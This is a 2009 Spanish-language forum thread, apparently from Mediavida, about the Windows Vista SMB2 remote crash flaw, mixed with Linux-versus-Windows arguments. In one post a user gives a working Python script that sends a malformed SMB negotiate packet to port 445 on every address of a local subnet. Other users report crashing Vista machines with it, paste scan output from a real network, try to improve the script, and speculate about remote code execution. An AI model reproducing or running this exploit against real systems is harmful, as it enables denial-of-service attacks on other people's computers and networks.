Nuke a Windows. Cuelga tu sistema de nuevo

S1L3nCe #61 Sep '09

"que curiosos los pantallazos azules que saltan de vez en cuando con juegos de steam (y otros) en windows, mira eso no pasa en linux"

Creo que si he tenido 2 pantallazos azules en los ultimos 4 años son muchos (1 por memoria ram petada y otro por overclock con voltaje insuficiente). Creo que en windows xp jamás tuve un pantallazo azul por un problema de software. De hecho, descartando los BSOD por fallo de hardware, la gran mayoría de los BSOD de la peña son por malware.

"Ademas de que linux es mejor para jugar online por si no lo sabias"

Podrías explayarte en describir las mejoras que supone el juego online en Linux sobre un Windows XP o Windows 7?

Está claro que WinXP o 7 (vista no existe xD) no son mas que sistemas operativos meramente funcionales que satisfacen las necesidades de un determinado público. El trabajo que hay detrás de cada distro de Linux es admirable e innegable y en muchos aspectos está a años luz de Microsoft pero tenéis una tendencia a meterle mas mierda de la que ya tiene. No entiendo como no os agota el estar siempre enfrentados con este tema de verdad... que aguante la hostia xD

LzO #62 Sep '09

#61 Podrías explayarte en describir las mejoras que supone el juego online en Linux sobre un Windows XP o Windows 7?

El protocolo TCP/IP.

Get #63 Sep '09

wine(actualmente la 0.9.33) <-- FAIL

Wine va por la version 1.XX - Si alguien va a hablar de linux y no usa otra cosa q no sea ubuntu, mejor no lo haga.

estoy deacuerdo con lZo, el protocolo TCP/IP fue creado e implementado sobre sistema BSD/Unix, que luego MS implemento tambien, pero claro, no es lo mismo ni va igual de bien.

DiSKuN #64 Sep '09 Gafe

Hay u nmodo más facil. Instalar PlayOnLinux y él solito te lo instala

ChOu #66 Sep '09

Ya lo dicen por otras web, es FAKE.

neo-ns #67 Sep '09

El que es fake?

-

-SoNiC- #68 Sep '09

Centrándonos en el hilo, alguien ha posteado en bandaancha esta captura después de hacer la prueba de marras. A simple vista parece una máquina virtual con Windows 7 y el error parece el correcto de fallo en área no páginada, aunque estaría genial tener más datos y probar mejor que condiciones son las necesarias para que se produzca el fallo.

Fuente

Ahora lo suyo si de verdad estais picados y quereis averiguar que ocurre lo suyo es que cada uno haga sus pruebas y postee los resultados junto con las características recreadas para ello, como ha hecho Anubis. Esto es lo divertido de la informática, trastear y hacer que pete

Choimbo #69 Sep '09

esto de los nukes me recuerda al IRc jejeje

S1L3nCe #71 Sep '09

#65 Lo normal es que disfrutases a corto plazo de un juego tan simple como ese y no a la larga.

Es curioso que ciertas personas se sientan superiores al resto por el simple hecho de usar un sistema operativo "X". Y ya no lo digo por los que usais Linux VS Windows; hay usuarios de Linux que insultan a otros incluso por usar una distro distinta! Vamos, que a algunos les va en la sangre el tocar los cojones al prójimo.

Si realmente tenéis interés en que la gente use Linux, el tratarles de inferiores por usar otro SO no es la forma. Hay quien enseña con la finalidad de que otros aprendan algo distinto y hay quien "enseña" con la finalidad de constatar su superioridad. Lo segundo es frustrante para el que escucha, dañino tanto para el que escucha y para el que "enseña" y poco efectivo en lo que a aprendizaje se refiere. Pero es condición humana en muchos de nosotros por desgracia.

EDIT

#72 +1

-

-SoNiC- #72 Sep '09

Lo poco agrada y lo mucho jode. No está mal tener ciertos debates de vez en cuando y contrastar opiniones, pero os estais pasando hasta el punto de inundar hilos que no tienen que ver con las mismas chorradas.

Ya vale de piques absurdos, ¿no? Cada uno en base a sus exigencias y necesidades elegirá libremente un s.o., navegador o aplicación que desea, porque cada caso es distinto y todo tiene sus pros y sus contras. No sabeis tener un punto medio, esto no consiste en "o conmigo o contra mí", sino más bien en un "depende".

Attitude and respect plz... =/

#73 ¿Más datos? Quítale el reinicio automático por los pantallazos a ver si se parece a la screen, curiosidad ^^

neo-ns #73 Sep '09

yo he echo un nuke a un windows vista de aqui al curro y se ha reniciado al instante.... XD

MaKi #74 Sep '09

Lo he modificado un poco, para hacer un barrido a una red de tipo C:

spoiler

#!/usr/bin/python

from socket import socket
from time import sleep

exito = []
red_c = "192.168.1.%d"

for i in range(255):
     host = red_c % (i+1)
     print "Intentando con %s" % host
     buff = (
     "\x00\x00\x00\x90" # Begin SMB header: Session message
     "\xff\x53\x4d\x42" # Server Component: SMB
     "\x72\x00\x00\x00" # Negociate Protocol
     "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
     "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
     "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
     "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
     "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
     "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
     "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
     "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
     "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
     "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
     "\x30\x30\x32\x00"
     )

 try:
      s = socket()
      s.connect((host,445))
      s.send(buff)
      s.close()
      print "Cadena enviada con exito a %s" % host
      exito.append(host)
 except:
      print "Error enviando la cadena a %s" % host

 print "---------------------------------------------"

print "Informe de host que han recibido la cadena"
print "---------------------------------------------"
for host in exito:
     print host

MaKi #75 Sep '09

Ayer Microsoft publico la lista de afectados, asi que de fake va a ser que no xD.
Además Microsoft habla de ejcución de código, por tanto el bug podría ser mucho más grave que un nuke.
El exploit de python ha hecho tras la corrupción de la cabezera un minishellcode para provocar un fallo crítico de paginación. Pero sería fácil hacer un shellcode esperando en algún puerto con permisos de admin a partir de que tenemos ejecución de código arbitraria. Windows 7 no está en la lista de afectados, por lo tanto o esta parcheado, o mienten.

Afectados:

Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2

NO AFECTADOS:

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

Fuente: http://www.microsoft.com/technet/security/advisory/975497.mspx#E2C

aNuBiS #76 Sep '09

Pues yo sigo sin haberlo conseguido. #68 Si, lo divertido es hacer que pete, pero cuando no peta...Es un problema! jajaja.

Esperando mas pruebas, si #73 puedes dar mas datos, tipo de SO, memoria Ram, ¿micro?...No se, a ver si encontramos un patron. Supongo que debe estar en la ram? o en el tamaño de paginacion del SO? porque si funciona en una VM descartamos que afecte a cierto tipo de proecsadores y tal...creo. Si digo alguna burrada, lo siento .

Voy a probar en W.vista

erdanblo #77 Sep '09 Inocente

#75 Pues yo lo probe con el Windows 7 xD, y el de BA creo que ha dicho que era 7 tb.

QueTzaL #78 Sep '09 Inocente

#68 Mas de lo mismo, no se cita que SO es el afectado.

#75 Lo que yo decia, de todos modos sigo teniendo la duda de que Windows 7 dice la gente que peta, sigo apostado que son los <7600 y por ello M$ dice que no peta.

aNuBiS #79 Sep '09

Con windows vista profesional 64bits ¡Funciona!, sin desactivar nada, lo he encendido y segun ha entrado he ejecutado el exploit y lo ha tirado, una pasada !! jajaja. Ahora a ver si alguien saca o se curra algo para ejecutar codigo remoto (hasta tanto no llego ) y ya seria la repanocha.

#77 Sigue emperrado en que funciona con w7... no ¬¬ jajaja.

-

-SoNiC- #80 Sep '09

Viendo despacito la letra pequeña del link de #75 uno encuentra algunas... "incoherencias" y variables para generar el error:

spoiler

aNuBiS #81 Sep '09

#80 entonces...¿Ya sabian que esa vulnerabilidad existia? Es decir, si en vista esta, en W7 RC esta y en W7 no esta...Algo han debido de tocar...

[Edit] Es una paranoya pero...¿Y si lo han "descubierto" ellos mismos? Es decir, solo afecta a Vista, sueltan ahora esta vulnerabilidad (ha pasado mucho tiempo, digo yo que alguien mas lo habria encontrado) y no la corrigen, pero en W7 no esta...Es una forma de obligar a la gente a que se pase.

Get #82 Sep '09

fomentan leyendas, encima con mentiras, privatizan todo lo q pillan, a base de patentes no dejan evolucionar a la competencia ....

que puedes esperar mas de una empresa asi. Aun te extraña?

A

aqem #83 Sep '09

#81 si contratan al que lo descubrio se considera como ellos mismos?
sinceramente creo que el w7 tenia ese agujero pero le ponen mas interes que al vista para corregir fallos.

Get #84 Sep '09

bueno pos si, funciona hasta con xp ...
---------------------------------------------
Intentando con 10.49.97.185

Error enviando la cadena a 10.49.97.185

Intentando con 10.49.97.186

Cadena enviada con exito a 10.49.97.186

Intentando con 10.49.97.187

Error enviando la cadena a 10.49.97.187

Intentando con 10.49.97.188

Error enviando la cadena a 10.49.97.188

Intentando con 10.49.97.189

Error enviando la cadena a 10.49.97.189

Intentando con 10.49.97.190

Error enviando la cadena a 10.49.97.190

Intentando con 10.49.97.191

^CError enviando la cadena a 10.49.97.191

Intentando con 10.49.97.192

Cadena enviada con exito a 10.49.97.192

notese q no todos los equipos en la red estan on

aNuBiS #85 Sep '09

#84 ¿Estas de coña de verdad? Si eso lo has sacado del script que ha puesto antes el usuario...Simplemente comprueba que la cadena llegue a su destino, que no tiene porque funcionar, simplemente llega. Ayer con W7 la cadena llegaba, pero no se reiniciaba...Mira que te gusta soltar humo ¿eh?

#83 ...¿no? xD. Es imposible que hayan puesto mas empeño en solucionarlo porque el exploit salio hace 2 dias, el W7 que estoy utilizando es mucho anterior, y no se ha actualizado de ninguna forma desde la salida del xploit, por lo tanto...que es rrraro!.

MaKi #86 Sep '09

#84 jeje sorry Get por la confusión.

La único que hace es lo que te dicen, comprobar si llega lo cadena o no, de hay a que tenga el efecto deseado o no, no te lo dice.

Habría que modificarlo para hacerlo 2 veces por IP, si la primera tiene exito, y la segundo vez no, casi seguro, tuvo los efectos buscados.

PlrA #87 Sep '09 Lame ruedas

Llevo un rato probandolo, con dos pcs en red con W7, uno con la "oficial" y desde el que escribo con la RC7624.
Nada, ninguno de los dos peta, todo abierto, ni antivirus ni firewalls ni nada...
Yo uso tb linux (suse y ubuntu) y mosquea un poco ver lo fanaticos que soys los linuxeros, como si os hubieran quitado la comida los de MS, eso y la cantidad de creidos que hay, que se creen que por manejar linux son superiores (que es una gran cantidad de linux users..) es lo que me da asco de linux. No dais el brazo a torcer JAMAS.

No se donde esta el problema de convivir con ambos SO.

BLZKZ #88 Sep '09

#87 ni yo, es más no entiendo tampoco el odio irracional de los windowseros hacia vista :/. Yo tengo arch y vista, y el vista para lo que lo uso (jugar) va genial.

Tampoco entiendo los mitos que giran en torno a linux, de ahi que seamos un tanto más agresivos "defendiendo linux"

aNuBiS #89 Sep '09

#86 Estaba intentando hacerlo, pero no soy capaz, a ver si me puedes echar una mano (Un poco de offtopic, lo se), que nunca he hecho nada con py.

Lo que he hecho ha sido coger tu codigo y ... :

try:
          s = socket()
          s.connect((host,445))
          s.send(buff)
          s.close()
          sleep(3) // esta importada creo
          

      try:
      s = socket()
      s.connect((host,445))
      s.send(buff)
      s.close()

      print "Cadena enviada con exito a %s" % host
      exito.append(host)

     except:
      print "Error enviando la cadena a %s" % host

except:
          print "loquesea"

respetando los indentados y tal, es decir, el programa funciona ejecuta sin problemas, pero se queda pillado en los try...Seguro que hay otra forma mas limpia de hacerlo peero .

Es decir, simplemente dentro dle try le digo que haga otro try con su except y despues otro except para el primer try...El sleep funciona seguro (lo probe antes de tocar nada mas) pero se queda pillado en "intentando con "ip" y no hace nada mas ¿no se pueden meter dos try juntos?

Loa #90 Sep '09 :psyduck:

#60 las quejas sobre moderadores en el foro de mediavida gracias

¿ Porque en Windows hay virus y en Linux no?

Error, hay virus para ambos sistemas, solo que en Linux son menos criticos de lo que pueden llegar a ser en Windows debido a su sistema de permisos. Digamos que los virus de Linux son como la tipica broma en Flash para Windows.

Esto es debido a que la gente en windows esta acostumbrada a usar el usuario administrador de normal, mientras que en linux root se reserva mas.

En ambos casos hay exploits para hacerse con permisos, asi que todos fallan.

saludos, en los foros libres se discute de lo que queráis... con RESPETO